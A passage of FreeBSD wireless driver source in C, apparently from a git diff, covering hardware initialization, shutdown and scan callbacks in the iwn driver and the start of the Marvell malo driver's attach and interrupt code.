(!(IWN_READ(sc, IWN_HW_IF_CONFIG) & IWN_HW_IF_CONFIG_PREPARE_DONE)) break; DELAY(10); } if (ntries == 15000) return ETIMEDOUT; /* Hardware should be ready now. */ IWN_SETBITS(sc, IWN_HW_IF_CONFIG, IWN_HW_IF_CONFIG_NIC_READY); for (ntries = 0; ntries < 5; ntries++) { if (IWN_READ(sc, IWN_HW_IF_CONFIG) & IWN_HW_IF_CONFIG_NIC_READY) return 0; DELAY(10); } return ETIMEDOUT; } static int iwn_hw_init(struct iwn_softc *sc) { struct iwn_ops *ops = &sc->ops; int error, chnl, qid; DPRINTF(sc, IWN_DEBUG_TRACE, "->%s begin\n", __func__); /* Clear pending interrupts. */ IWN_WRITE(sc, IWN_INT, 0xffffffff); if ((error = iwn_apm_init(sc)) != 0) { device_printf(sc->sc_dev, "%s: could not power ON adapter, error %d\n", __func__, error); return error; } /* Select VMAIN power source. */ if ((error = iwn_nic_lock(sc)) != 0) return error; iwn_prph_clrbits(sc, IWN_APMG_PS, IWN_APMG_PS_PWR_SRC_MASK); iwn_nic_unlock(sc); /* Perform adapter-specific initialization. */ if ((error = ops->nic_config(sc)) != 0) return error; /* Initialize RX ring. */ if ((error = iwn_nic_lock(sc)) != 0) return error; IWN_WRITE(sc, IWN_FH_RX_CONFIG, 0); IWN_WRITE(sc, IWN_FH_RX_WPTR, 0); /* Set physical address of RX ring (256-byte aligned). */ IWN_WRITE(sc, IWN_FH_RX_BASE, sc->rxq.desc_dma.paddr >> 8); /* Set physical address of RX status (16-byte aligned). */ IWN_WRITE(sc, IWN_FH_STATUS_WPTR, sc->rxq.stat_dma.paddr >> 4); /* Enable RX. 
*/ IWN_WRITE(sc, IWN_FH_RX_CONFIG, IWN_FH_RX_CONFIG_ENA | IWN_FH_RX_CONFIG_IGN_RXF_EMPTY | /* HW bug workaround */ IWN_FH_RX_CONFIG_IRQ_DST_HOST | IWN_FH_RX_CONFIG_SINGLE_FRAME | IWN_FH_RX_CONFIG_RB_TIMEOUT(0) | IWN_FH_RX_CONFIG_NRBD(IWN_RX_RING_COUNT_LOG)); iwn_nic_unlock(sc); IWN_WRITE(sc, IWN_FH_RX_WPTR, (IWN_RX_RING_COUNT - 1) & ~7); if ((error = iwn_nic_lock(sc)) != 0) return error; /* Initialize TX scheduler. */ iwn_prph_write(sc, sc->sched_txfact_addr, 0); /* Set physical address of "keep warm" page (16-byte aligned). */ IWN_WRITE(sc, IWN_FH_KW_ADDR, sc->kw_dma.paddr >> 4); /* Initialize TX rings. */ for (qid = 0; qid < sc->ntxqs; qid++) { struct iwn_tx_ring *txq = &sc->txq[qid]; /* Set physical address of TX ring (256-byte aligned). */ IWN_WRITE(sc, IWN_FH_CBBC_QUEUE(qid), txq->desc_dma.paddr >> 8); } iwn_nic_unlock(sc); /* Enable DMA channels. */ for (chnl = 0; chnl < sc->ndmachnls; chnl++) { IWN_WRITE(sc, IWN_FH_TX_CONFIG(chnl), IWN_FH_TX_CONFIG_DMA_ENA | IWN_FH_TX_CONFIG_DMA_CREDIT_ENA); } /* Clear "radio off" and "commands blocked" bits. */ IWN_WRITE(sc, IWN_UCODE_GP1_CLR, IWN_UCODE_GP1_RFKILL); IWN_WRITE(sc, IWN_UCODE_GP1_CLR, IWN_UCODE_GP1_CMD_BLOCKED); /* Clear pending interrupts. */ IWN_WRITE(sc, IWN_INT, 0xffffffff); /* Enable interrupt coalescing. */ IWN_WRITE(sc, IWN_INT_COALESCING, 512 / 8); /* Enable interrupts. */ IWN_WRITE(sc, IWN_INT_MASK, sc->int_mask); /* _Really_ make sure "radio off" bit is cleared! */ IWN_WRITE(sc, IWN_UCODE_GP1_CLR, IWN_UCODE_GP1_RFKILL); IWN_WRITE(sc, IWN_UCODE_GP1_CLR, IWN_UCODE_GP1_RFKILL); /* Enable shadow registers. */ if (sc->base_params->shadow_reg_enable) IWN_SETBITS(sc, IWN_SHADOW_REG_CTRL, 0x800fffff); if ((error = ops->load_firmware(sc)) != 0) { device_printf(sc->sc_dev, "%s: could not load firmware, error %d\n", __func__, error); return error; } /* Wait at most one second for firmware alive notification. */ if ((error = msleep(sc, &sc->sc_mtx, PCATCH, "iwninit", hz)) != 0) { device_printf(sc->sc_dev, "%s: timeout waiting for adapter to initialize, error %d\n", __func__, error); return error; } /* Do post-firmware initialization. */ DPRINTF(sc, IWN_DEBUG_TRACE, "->%s: end\n",__func__); return ops->post_alive(sc); } static void iwn_hw_stop(struct iwn_softc *sc) { int chnl, qid, ntries; DPRINTF(sc, IWN_DEBUG_TRACE, "->Doing %s\n", __func__); IWN_WRITE(sc, IWN_RESET, IWN_RESET_NEVO); /* Disable interrupts. */ IWN_WRITE(sc, IWN_INT_MASK, 0); IWN_WRITE(sc, IWN_INT, 0xffffffff); IWN_WRITE(sc, IWN_FH_INT, 0xffffffff); sc->sc_flags &= ~IWN_FLAG_USE_ICT; /* Make sure we no longer hold the NIC lock. */ iwn_nic_unlock(sc); /* Stop TX scheduler. */ iwn_prph_write(sc, sc->sched_txfact_addr, 0); /* Stop all DMA channels. */ if (iwn_nic_lock(sc) == 0) { for (chnl = 0; chnl < sc->ndmachnls; chnl++) { IWN_WRITE(sc, IWN_FH_TX_CONFIG(chnl), 0); for (ntries = 0; ntries < 200; ntries++) { if (IWN_READ(sc, IWN_FH_TX_STATUS) & IWN_FH_TX_STATUS_IDLE(chnl)) break; DELAY(10); } } iwn_nic_unlock(sc); } /* Stop RX ring. */ iwn_reset_rx_ring(sc, &sc->rxq); /* Reset all TX rings. */ for (qid = 0; qid < sc->ntxqs; qid++) iwn_reset_tx_ring(sc, &sc->txq[qid]); if (iwn_nic_lock(sc) == 0) { iwn_prph_write(sc, IWN_APMG_CLK_DIS, IWN_APMG_CLK_CTRL_DMA_CLK_RQT); iwn_nic_unlock(sc); } DELAY(5); /* Power OFF adapter. 
*/ iwn_apm_stop(sc); } static void iwn_radio_on(void *arg0, int pending) { struct iwn_softc *sc = arg0; struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct ieee80211vap *vap = TAILQ_FIRST(&ic->ic_vaps); DPRINTF(sc, IWN_DEBUG_TRACE, "->Doing %s\n", __func__); if (vap != NULL) { iwn_init(sc); ieee80211_init(vap); } } static void iwn_radio_off(void *arg0, int pending) { struct iwn_softc *sc = arg0; struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct ieee80211vap *vap = TAILQ_FIRST(&ic->ic_vaps); DPRINTF(sc, IWN_DEBUG_TRACE, "->Doing %s\n", __func__); iwn_stop(sc); if (vap != NULL) ieee80211_stop(vap); /* Enable interrupts to get RF toggle notification. */ IWN_LOCK(sc); IWN_WRITE(sc, IWN_INT, 0xffffffff); IWN_WRITE(sc, IWN_INT_MASK, sc->int_mask); IWN_UNLOCK(sc); } static void iwn_init_locked(struct iwn_softc *sc) { struct ifnet *ifp = sc->sc_ifp; int error; DPRINTF(sc, IWN_DEBUG_TRACE, "->%s begin\n", __func__); IWN_LOCK_ASSERT(sc); if ((error = iwn_hw_prepare(sc)) != 0) { device_printf(sc->sc_dev, "%s: hardware not ready, error %d\n", __func__, error); goto fail; } /* Initialize interrupt mask to default value. */ sc->int_mask = IWN_INT_MASK_DEF; sc->sc_flags &= ~IWN_FLAG_USE_ICT; /* Check that the radio is not disabled by hardware switch. */ if (!(IWN_READ(sc, IWN_GP_CNTRL) & IWN_GP_CNTRL_RFKILL)) { device_printf(sc->sc_dev, "radio is disabled by hardware switch\n"); /* Enable interrupts to get RF toggle notifications. */ IWN_WRITE(sc, IWN_INT, 0xffffffff); IWN_WRITE(sc, IWN_INT_MASK, sc->int_mask); return; } /* Read firmware images from the filesystem. */ if ((error = iwn_read_firmware(sc)) != 0) { device_printf(sc->sc_dev, "%s: could not read firmware, error %d\n", __func__, error); goto fail; } /* Initialize hardware and upload firmware. */ error = iwn_hw_init(sc); firmware_put(sc->fw_fp, FIRMWARE_UNLOAD); sc->fw_fp = NULL; if (error != 0) { device_printf(sc->sc_dev, "%s: could not initialize hardware, error %d\n", __func__, error); goto fail; } /* Configure adapter now that it is ready. */ if ((error = iwn_config(sc)) != 0) { device_printf(sc->sc_dev, "%s: could not configure device, error %d\n", __func__, error); goto fail; } ifp->if_drv_flags &= ~IFF_DRV_OACTIVE; ifp->if_drv_flags |= IFF_DRV_RUNNING; callout_reset(&sc->watchdog_to, hz, iwn_watchdog, sc); DPRINTF(sc, IWN_DEBUG_TRACE, "->%s: end\n",__func__); return; fail: iwn_stop_locked(sc); DPRINTF(sc, IWN_DEBUG_TRACE, "->%s: end in error\n",__func__); } static void iwn_init(void *arg) { struct iwn_softc *sc = arg; struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; IWN_LOCK(sc); iwn_init_locked(sc); IWN_UNLOCK(sc); if (ifp->if_drv_flags & IFF_DRV_RUNNING) ieee80211_start_all(ic); } static void iwn_stop_locked(struct iwn_softc *sc) { struct ifnet *ifp = sc->sc_ifp; IWN_LOCK_ASSERT(sc); sc->sc_is_scanning = 0; sc->sc_tx_timer = 0; callout_stop(&sc->watchdog_to); callout_stop(&sc->calib_to); ifp->if_drv_flags &= ~(IFF_DRV_RUNNING | IFF_DRV_OACTIVE); /* Power OFF hardware. */ iwn_hw_stop(sc); } static void iwn_stop(struct iwn_softc *sc) { IWN_LOCK(sc); iwn_stop_locked(sc); IWN_UNLOCK(sc); } /* * Callback from net80211 to start a scan. */ static void iwn_scan_start(struct ieee80211com *ic) { struct ifnet *ifp = ic->ic_ifp; struct iwn_softc *sc = ifp->if_softc; IWN_LOCK(sc); /* make the link LED blink while we're scanning */ iwn_set_led(sc, IWN_LED_LINK, 20, 2); IWN_UNLOCK(sc); } /* * Callback from net80211 to terminate a scan. 
 */
static void
iwn_scan_end(struct ieee80211com *ic)
{
	struct ifnet *ifp = ic->ic_ifp;
	struct iwn_softc *sc = ifp->if_softc;
	struct ieee80211vap *vap = TAILQ_FIRST(&ic->ic_vaps);

	IWN_LOCK(sc);
	if (vap->iv_state == IEEE80211_S_RUN) {
		/* Set link LED to ON status if we are associated */
		iwn_set_led(sc, IWN_LED_LINK, 0, 1);
	}
	IWN_UNLOCK(sc);
}

/*
 * Callback from net80211 to force a channel change.
 */
static void
iwn_set_channel(struct ieee80211com *ic)
{
	const struct ieee80211_channel *c = ic->ic_curchan;
	struct ifnet *ifp = ic->ic_ifp;
	struct iwn_softc *sc = ifp->if_softc;
	int error;

	DPRINTF(sc, IWN_DEBUG_TRACE, "->Doing %s\n", __func__);

	IWN_LOCK(sc);
	sc->sc_rxtap.wr_chan_freq = htole16(c->ic_freq);
	sc->sc_rxtap.wr_chan_flags = htole16(c->ic_flags);
	sc->sc_txtap.wt_chan_freq = htole16(c->ic_freq);
	sc->sc_txtap.wt_chan_flags = htole16(c->ic_flags);

	/*
	 * Only need to set the channel in Monitor mode. AP scanning and auth
	 * are already taken care of by their respective firmware commands.
	 */
	if (ic->ic_opmode == IEEE80211_M_MONITOR) {
		error = iwn_config(sc);
		if (error != 0)
			device_printf(sc->sc_dev,
			    "%s: error %d setting channel\n", __func__, error);
	}
	IWN_UNLOCK(sc);
}

/*
 * Callback from net80211 to start scanning of the current channel.
 */
static void
iwn_scan_curchan(struct ieee80211_scan_state *ss, unsigned long maxdwell)
{
	struct ieee80211vap *vap = ss->ss_vap;
	struct iwn_softc *sc = vap->iv_ic->ic_ifp->if_softc;
	struct ieee80211com *ic = vap->iv_ic;
	int error;

	IWN_LOCK(sc);
	error = iwn_scan(sc, vap, ss, ic->ic_curchan);
	IWN_UNLOCK(sc);
	if (error != 0)
		ieee80211_cancel_scan(vap);
}

/*
 * Callback from net80211 to handle the minimum dwell time being met.
 * The intent is to terminate the scan but we just let the firmware
 * notify us when it's finished as we have no safe way to abort it.
*/ static void iwn_scan_mindwell(struct ieee80211_scan_state *ss) { /* NB: don't try to abort scan; wait for firmware to finish */ } static void iwn_hw_reset(void *arg0, int pending) { struct iwn_softc *sc = arg0; struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; DPRINTF(sc, IWN_DEBUG_TRACE, "->Doing %s\n", __func__); iwn_stop(sc); iwn_init(sc); ieee80211_notify_radio(ic, 1); } #ifdef IWN_DEBUG #define IWN_DESC(x) case x: return #x #define COUNTOF(array) (sizeof(array) / sizeof(array[0])) /* * Translate CSR code to string */ static char *iwn_get_csr_string(int csr) { switch (csr) { IWN_DESC(IWN_HW_IF_CONFIG); IWN_DESC(IWN_INT_COALESCING); IWN_DESC(IWN_INT); IWN_DESC(IWN_INT_MASK); IWN_DESC(IWN_FH_INT); IWN_DESC(IWN_GPIO_IN); IWN_DESC(IWN_RESET); IWN_DESC(IWN_GP_CNTRL); IWN_DESC(IWN_HW_REV); IWN_DESC(IWN_EEPROM); IWN_DESC(IWN_EEPROM_GP); IWN_DESC(IWN_OTP_GP); IWN_DESC(IWN_GIO); IWN_DESC(IWN_GP_UCODE); IWN_DESC(IWN_GP_DRIVER); IWN_DESC(IWN_UCODE_GP1); IWN_DESC(IWN_UCODE_GP2); IWN_DESC(IWN_LED); IWN_DESC(IWN_DRAM_INT_TBL); IWN_DESC(IWN_GIO_CHICKEN); IWN_DESC(IWN_ANA_PLL); IWN_DESC(IWN_HW_REV_WA); IWN_DESC(IWN_DBG_HPET_MEM); default: return "UNKNOWN CSR"; } } /* * This function print firmware register */ static void iwn_debug_register(struct iwn_softc *sc) { int i; static const uint32_t csr_tbl[] = { IWN_HW_IF_CONFIG, IWN_INT_COALESCING, IWN_INT, IWN_INT_MASK, IWN_FH_INT, IWN_GPIO_IN, IWN_RESET, IWN_GP_CNTRL, IWN_HW_REV, IWN_EEPROM, IWN_EEPROM_GP, IWN_OTP_GP, IWN_GIO, IWN_GP_UCODE, IWN_GP_DRIVER, IWN_UCODE_GP1, IWN_UCODE_GP2, IWN_LED, IWN_DRAM_INT_TBL, IWN_GIO_CHICKEN, IWN_ANA_PLL, IWN_HW_REV_WA, IWN_DBG_HPET_MEM, }; DPRINTF(sc, IWN_DEBUG_REGISTER, "CSR values: (2nd byte of IWN_INT_COALESCING is IWN_INT_PERIODIC)%s", "\n"); for (i = 0; i < COUNTOF(csr_tbl); i++){ DPRINTF(sc, IWN_DEBUG_REGISTER," %10s: 0x%08x ", iwn_get_csr_string(csr_tbl[i]), IWN_READ(sc, csr_tbl[i])); if ((i+1) % 3 == 0) DPRINTF(sc, IWN_DEBUG_REGISTER,"%s","\n"); } DPRINTF(sc, IWN_DEBUG_REGISTER,"%s","\n"); } #endif diff --git a/sys/dev/malo/if_malo.c b/sys/dev/malo/if_malo.c index 5f1288975652..7817462be0c0 100644 --- a/sys/dev/malo/if_malo.c +++ b/sys/dev/malo/if_malo.c @@ -1,2292 +1,2292 @@ /*- * Copyright (c) 2008 Weongyo Jeong * Copyright (c) 2007 Marvell Semiconductor, Inc. * Copyright (c) 2007 Sam Leffler, Errno Consulting * All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer, * without modification. * 2. Redistributions in binary form must reproduce at minimum a disclaimer * similar to the "NO WARRANTY" disclaimer below ("Disclaimer") and any * redistribution must be conditioned upon including a substantially * similar Disclaimer requirement for further binary redistribution. * * NO WARRANTY * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS * ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT * LIMITED TO, THE IMPLIED WARRANTIES OF NONINFRINGEMENT, MERCHANTIBILITY * AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. 
IN NO EVENT SHALL * THE COPYRIGHT HOLDERS OR CONTRIBUTORS BE LIABLE FOR SPECIAL, EXEMPLARY, * OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF * SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS * INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER * IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF * THE POSSIBILITY OF SUCH DAMAGES. */ #include #ifdef __FreeBSD__ __FBSDID("$FreeBSD$"); #endif #include "opt_malo.h" #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include SYSCTL_NODE(_hw, OID_AUTO, malo, CTLFLAG_RD, 0, "Marvell 88w8335 driver parameters"); static int malo_txcoalesce = 8; /* # tx pkts to q before poking f/w*/ SYSCTL_INT(_hw_malo, OID_AUTO, txcoalesce, CTLFLAG_RW, &malo_txcoalesce, 0, "tx buffers to send at once"); TUNABLE_INT("hw.malo.txcoalesce", &malo_txcoalesce); static int malo_rxbuf = MALO_RXBUF; /* # rx buffers to allocate */ SYSCTL_INT(_hw_malo, OID_AUTO, rxbuf, CTLFLAG_RW, &malo_rxbuf, 0, "rx buffers allocated"); TUNABLE_INT("hw.malo.rxbuf", &malo_rxbuf); static int malo_rxquota = MALO_RXBUF; /* # max buffers to process */ SYSCTL_INT(_hw_malo, OID_AUTO, rxquota, CTLFLAG_RW, &malo_rxquota, 0, "max rx buffers to process per interrupt"); TUNABLE_INT("hw.malo.rxquota", &malo_rxquota); static int malo_txbuf = MALO_TXBUF; /* # tx buffers to allocate */ SYSCTL_INT(_hw_malo, OID_AUTO, txbuf, CTLFLAG_RW, &malo_txbuf, 0, "tx buffers allocated"); TUNABLE_INT("hw.malo.txbuf", &malo_txbuf); #ifdef MALO_DEBUG static int malo_debug = 0; SYSCTL_INT(_hw_malo, OID_AUTO, debug, CTLFLAG_RW, &malo_debug, 0, "control debugging printfs"); TUNABLE_INT("hw.malo.debug", &malo_debug); enum { MALO_DEBUG_XMIT = 0x00000001, /* basic xmit operation */ MALO_DEBUG_XMIT_DESC = 0x00000002, /* xmit descriptors */ MALO_DEBUG_RECV = 0x00000004, /* basic recv operation */ MALO_DEBUG_RECV_DESC = 0x00000008, /* recv descriptors */ MALO_DEBUG_RESET = 0x00000010, /* reset processing */ MALO_DEBUG_INTR = 0x00000040, /* ISR */ MALO_DEBUG_TX_PROC = 0x00000080, /* tx ISR proc */ MALO_DEBUG_RX_PROC = 0x00000100, /* rx ISR proc */ MALO_DEBUG_STATE = 0x00000400, /* 802.11 state transitions */ MALO_DEBUG_NODE = 0x00000800, /* node management */ MALO_DEBUG_RECV_ALL = 0x00001000, /* trace all frames (beacons) */ MALO_DEBUG_FW = 0x00008000, /* firmware */ MALO_DEBUG_ANY = 0xffffffff }; #define IS_BEACON(wh) \ ((wh->i_fc[0] & (IEEE80211_FC0_TYPE_MASK | \ IEEE80211_FC0_SUBTYPE_MASK)) == \ (IEEE80211_FC0_TYPE_MGT|IEEE80211_FC0_SUBTYPE_BEACON)) #define IFF_DUMPPKTS_RECV(sc, wh) \ (((sc->malo_debug & MALO_DEBUG_RECV) && \ ((sc->malo_debug & MALO_DEBUG_RECV_ALL) || !IS_BEACON(wh))) || \ (sc->malo_ifp->if_flags & (IFF_DEBUG|IFF_LINK2)) == \ (IFF_DEBUG|IFF_LINK2)) #define IFF_DUMPPKTS_XMIT(sc) \ ((sc->malo_debug & MALO_DEBUG_XMIT) || \ (sc->malo_ifp->if_flags & (IFF_DEBUG | IFF_LINK2)) == \ (IFF_DEBUG | IFF_LINK2)) #define DPRINTF(sc, m, fmt, ...) do { \ if (sc->malo_debug & (m)) \ printf(fmt, __VA_ARGS__); \ } while (0) #else #define DPRINTF(sc, m, fmt, ...) 
do { \ (void) sc; \ } while (0) #endif static MALLOC_DEFINE(M_MALODEV, "malodev", "malo driver dma buffers"); static struct ieee80211vap *malo_vap_create(struct ieee80211com *, const char [IFNAMSIZ], int, enum ieee80211_opmode, int, const uint8_t [IEEE80211_ADDR_LEN], const uint8_t [IEEE80211_ADDR_LEN]); static void malo_vap_delete(struct ieee80211vap *); static int malo_dma_setup(struct malo_softc *); static int malo_setup_hwdma(struct malo_softc *); static void malo_txq_init(struct malo_softc *, struct malo_txq *, int); static void malo_tx_cleanupq(struct malo_softc *, struct malo_txq *); static void malo_start(struct ifnet *); static void malo_watchdog(void *); static int malo_ioctl(struct ifnet *, u_long, caddr_t); static void malo_updateslot(struct ifnet *); static int malo_newstate(struct ieee80211vap *, enum ieee80211_state, int); static void malo_scan_start(struct ieee80211com *); static void malo_scan_end(struct ieee80211com *); static void malo_set_channel(struct ieee80211com *); static int malo_raw_xmit(struct ieee80211_node *, struct mbuf *, const struct ieee80211_bpf_params *); static void malo_sysctlattach(struct malo_softc *); static void malo_announce(struct malo_softc *); static void malo_dma_cleanup(struct malo_softc *); static void malo_stop_locked(struct ifnet *, int); static int malo_chan_set(struct malo_softc *, struct ieee80211_channel *); static int malo_mode_init(struct malo_softc *); static void malo_tx_proc(void *, int); static void malo_rx_proc(void *, int); static void malo_init(void *); /* * Read/Write shorthands for accesses to BAR 0. Note that all BAR 1 * operations are done in the "hal" except getting H/W MAC address at * malo_attach and there should be no reference to them here. */ static uint32_t malo_bar0_read4(struct malo_softc *sc, bus_size_t off) { return bus_space_read_4(sc->malo_io0t, sc->malo_io0h, off); } static void malo_bar0_write4(struct malo_softc *sc, bus_size_t off, uint32_t val) { DPRINTF(sc, MALO_DEBUG_FW, "%s: off 0x%jx val 0x%x\n", __func__, (intmax_t)off, val); bus_space_write_4(sc->malo_io0t, sc->malo_io0h, off, val); } int malo_attach(uint16_t devid, struct malo_softc *sc) { int error; struct ieee80211com *ic; struct ifnet *ifp; struct malo_hal *mh; uint8_t bands; ifp = sc->malo_ifp = if_alloc(IFT_IEEE80211); if (ifp == NULL) { device_printf(sc->malo_dev, "can not if_alloc()\n"); return ENOSPC; } ic = ifp->if_l2com; MALO_LOCK_INIT(sc); callout_init_mtx(&sc->malo_watchdog_timer, &sc->malo_mtx, 0); /* set these up early for if_printf use */ if_initname(ifp, device_get_name(sc->malo_dev), device_get_unit(sc->malo_dev)); mh = malo_hal_attach(sc->malo_dev, devid, sc->malo_io1h, sc->malo_io1t, sc->malo_dmat); if (mh == NULL) { if_printf(ifp, "unable to attach HAL\n"); error = EIO; goto bad; } sc->malo_mh = mh; /* * Load firmware so we can get setup. We arbitrarily pick station * firmware; we'll re-load firmware as needed so setting up * the wrong mode isn't a big deal. */ error = malo_hal_fwload(mh, "malo8335-h", "malo8335-m"); if (error != 0) { if_printf(ifp, "unable to setup firmware\n"); goto bad1; } /* XXX gethwspecs() extracts correct informations? not maybe! 
*/ error = malo_hal_gethwspecs(mh, &sc->malo_hwspecs); if (error != 0) { if_printf(ifp, "unable to fetch h/w specs\n"); goto bad1; } DPRINTF(sc, MALO_DEBUG_FW, "malo_hal_gethwspecs: hwversion 0x%x hostif 0x%x" "maxnum_wcb 0x%x maxnum_mcaddr 0x%x maxnum_tx_wcb 0x%x" "regioncode 0x%x num_antenna 0x%x fw_releasenum 0x%x" "wcbbase0 0x%x rxdesc_read 0x%x rxdesc_write 0x%x" "ul_fw_awakecookie 0x%x w[4] = %x %x %x %x", sc->malo_hwspecs.hwversion, sc->malo_hwspecs.hostinterface, sc->malo_hwspecs.maxnum_wcb, sc->malo_hwspecs.maxnum_mcaddr, sc->malo_hwspecs.maxnum_tx_wcb, sc->malo_hwspecs.regioncode, sc->malo_hwspecs.num_antenna, sc->malo_hwspecs.fw_releasenum, sc->malo_hwspecs.wcbbase0, sc->malo_hwspecs.rxdesc_read, sc->malo_hwspecs.rxdesc_write, sc->malo_hwspecs.ul_fw_awakecookie, sc->malo_hwspecs.wcbbase[0], sc->malo_hwspecs.wcbbase[1], sc->malo_hwspecs.wcbbase[2], sc->malo_hwspecs.wcbbase[3]); /* NB: firmware looks that it does not export regdomain info API. */ bands = 0; setbit(&bands, IEEE80211_MODE_11B); setbit(&bands, IEEE80211_MODE_11G); ieee80211_init_channels(ic, NULL, &bands); sc->malo_txantenna = 0x2; /* h/w default */ sc->malo_rxantenna = 0xffff; /* h/w default */ /* * Allocate tx + rx descriptors and populate the lists. * We immediately push the information to the firmware * as otherwise it gets upset. */ error = malo_dma_setup(sc); if (error != 0) { if_printf(ifp, "failed to setup descriptors: %d\n", error); goto bad1; } error = malo_setup_hwdma(sc); /* push to firmware */ if (error != 0) /* NB: malo_setupdma prints msg */ goto bad2; sc->malo_tq = taskqueue_create_fast("malo_taskq", M_NOWAIT, taskqueue_thread_enqueue, &sc->malo_tq); taskqueue_start_threads(&sc->malo_tq, 1, PI_NET, "%s taskq", ifp->if_xname); TASK_INIT(&sc->malo_rxtask, 0, malo_rx_proc, sc); TASK_INIT(&sc->malo_txtask, 0, malo_tx_proc, sc); ifp->if_softc = sc; ifp->if_flags = IFF_SIMPLEX | IFF_BROADCAST | IFF_MULTICAST; ifp->if_start = malo_start; ifp->if_ioctl = malo_ioctl; ifp->if_init = malo_init; IFQ_SET_MAXLEN(&ifp->if_snd, ifqmaxlen); ifp->if_snd.ifq_drv_maxlen = ifqmaxlen; IFQ_SET_READY(&ifp->if_snd); ic->ic_ifp = ifp; /* XXX not right but it's not used anywhere important */ ic->ic_phytype = IEEE80211_T_OFDM; ic->ic_opmode = IEEE80211_M_STA; ic->ic_caps = IEEE80211_C_STA /* station mode supported */ | IEEE80211_C_BGSCAN /* capable of bg scanning */ | IEEE80211_C_MONITOR /* monitor mode */ | IEEE80211_C_SHPREAMBLE /* short preamble supported */ | IEEE80211_C_SHSLOT /* short slot time supported */ | IEEE80211_C_TXPMGT /* capable of txpow mgt */ | IEEE80211_C_WPA /* capable of WPA1+WPA2 */ ; /* * Transmit requires space in the packet for a special format transmit * record and optional padding between this record and the payload. * Ask the net80211 layer to arrange this when encapsulating * packets so we can add it efficiently. */ ic->ic_headroom = sizeof(struct malo_txrec) - sizeof(struct ieee80211_frame); /* call MI attach routine. 
*/ ieee80211_ifattach(ic, sc->malo_hwspecs.macaddr); /* override default methods */ ic->ic_vap_create = malo_vap_create; ic->ic_vap_delete = malo_vap_delete; ic->ic_raw_xmit = malo_raw_xmit; ic->ic_updateslot = malo_updateslot; ic->ic_scan_start = malo_scan_start; ic->ic_scan_end = malo_scan_end; ic->ic_set_channel = malo_set_channel; sc->malo_invalid = 0; /* ready to go, enable int handling */ ieee80211_radiotap_attach(ic, &sc->malo_tx_th.wt_ihdr, sizeof(sc->malo_tx_th), MALO_TX_RADIOTAP_PRESENT, &sc->malo_rx_th.wr_ihdr, sizeof(sc->malo_rx_th), MALO_RX_RADIOTAP_PRESENT); /* * Setup dynamic sysctl's. */ malo_sysctlattach(sc); if (bootverbose) ieee80211_announce(ic); malo_announce(sc); return 0; bad2: malo_dma_cleanup(sc); bad1: malo_hal_detach(mh); bad: if_free(ifp); sc->malo_invalid = 1; return error; } static struct ieee80211vap * malo_vap_create(struct ieee80211com *ic, const char name[IFNAMSIZ], int unit, enum ieee80211_opmode opmode, int flags, const uint8_t bssid[IEEE80211_ADDR_LEN], const uint8_t mac[IEEE80211_ADDR_LEN]) { struct ifnet *ifp = ic->ic_ifp; struct malo_vap *mvp; struct ieee80211vap *vap; if (!TAILQ_EMPTY(&ic->ic_vaps)) { if_printf(ifp, "multiple vaps not supported\n"); return NULL; } switch (opmode) { case IEEE80211_M_STA: if (opmode == IEEE80211_M_STA) flags |= IEEE80211_CLONE_NOBEACONS; /* fall thru... */ case IEEE80211_M_MONITOR: break; default: if_printf(ifp, "%s mode not supported\n", ieee80211_opmode_name[opmode]); return NULL; /* unsupported */ } mvp = (struct malo_vap *) malloc(sizeof(struct malo_vap), M_80211_VAP, M_NOWAIT | M_ZERO); if (mvp == NULL) { if_printf(ifp, "cannot allocate vap state block\n"); return NULL; } vap = &mvp->malo_vap; ieee80211_vap_setup(ic, vap, name, unit, opmode, flags, bssid, mac); /* override state transition machine */ mvp->malo_newstate = vap->iv_newstate; vap->iv_newstate = malo_newstate; /* complete setup */ ieee80211_vap_attach(vap, ieee80211_media_change, ieee80211_media_status); ic->ic_opmode = opmode; return vap; } static void malo_vap_delete(struct ieee80211vap *vap) { struct malo_vap *mvp = MALO_VAP(vap); ieee80211_vap_detach(vap); free(mvp, M_80211_VAP); } int malo_intr(void *arg) { struct malo_softc *sc = arg; struct malo_hal *mh = sc->malo_mh; uint32_t status; if (sc->malo_invalid) { /* * The hardware is not ready/present, don't touch anything. * Note this can happen early on if the IRQ is shared. */ DPRINTF(sc, MALO_DEBUG_ANY, "%s: invalid; ignored\n", __func__); return (FILTER_STRAY); } /* * Figure out the reason(s) for the interrupt. 
*/ malo_hal_getisr(mh, &status); /* NB: clears ISR too */ if (status == 0) /* must be a shared irq */ return (FILTER_STRAY); DPRINTF(sc, MALO_DEBUG_INTR, "%s: status 0x%x imask 0x%x\n", __func__, status, sc->malo_imask); if (status & MALO_A2HRIC_BIT_RX_RDY) taskqueue_enqueue_fast(sc->malo_tq, &sc->malo_rxtask); if (status & MALO_A2HRIC_BIT_TX_DONE) taskqueue_enqueue_fast(sc->malo_tq, &sc->malo_txtask); if (status & MALO_A2HRIC_BIT_OPC_DONE) malo_hal_cmddone(mh); if (status & MALO_A2HRIC_BIT_MAC_EVENT) ; if (status & MALO_A2HRIC_BIT_RX_PROBLEM) ; if (status & MALO_A2HRIC_BIT_ICV_ERROR) { /* TKIP ICV error */ sc->malo_stats.mst_rx_badtkipicv++; } #ifdef MALO_DEBUG if (((status | sc->malo_imask) ^ sc->malo_imask) != 0) DPRINTF(sc, MALO_DEBUG_INTR, "%s: can't handle interrupt status 0x%x\n", __func__, status); 